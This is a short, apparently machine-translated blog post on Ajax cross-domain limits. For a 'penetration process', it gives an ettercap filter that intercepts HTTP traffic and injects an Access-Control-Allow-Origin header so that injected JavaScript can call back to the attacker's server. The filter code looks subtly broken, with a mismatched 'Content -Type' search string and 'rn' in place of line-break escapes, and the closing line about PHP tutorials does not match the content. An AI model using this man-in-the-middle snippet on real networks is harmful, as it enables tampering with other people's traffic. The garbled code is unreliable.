Ajax cross-domain issues

Ajax can only access (submit forms, etc.) files in the same domain as the server asp, php, etc. This is because there is usually no in the http header returned by the server. Access-Control-Allow-Origin field. Therefore, during the penetration process, if we want the inserted JS to access our own server, we need to add this field to the http header. When using ettercap, add in the filter:

if(ip.proto == TCP && tcp.src == 80){

if (search(DATA.data, "Content -Type")){

#msg("access control");

replace("Content-Type","Access-Control-Allow-Origin:*rnContent-Type"); }

}

Access-Control-Allow-Origin: *

means that cross-domain requests for all web pages can be accepted or

Access-Control-Allow-Origin: www.baidu.com The above has introduced the cross-domain issues of Ajax, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.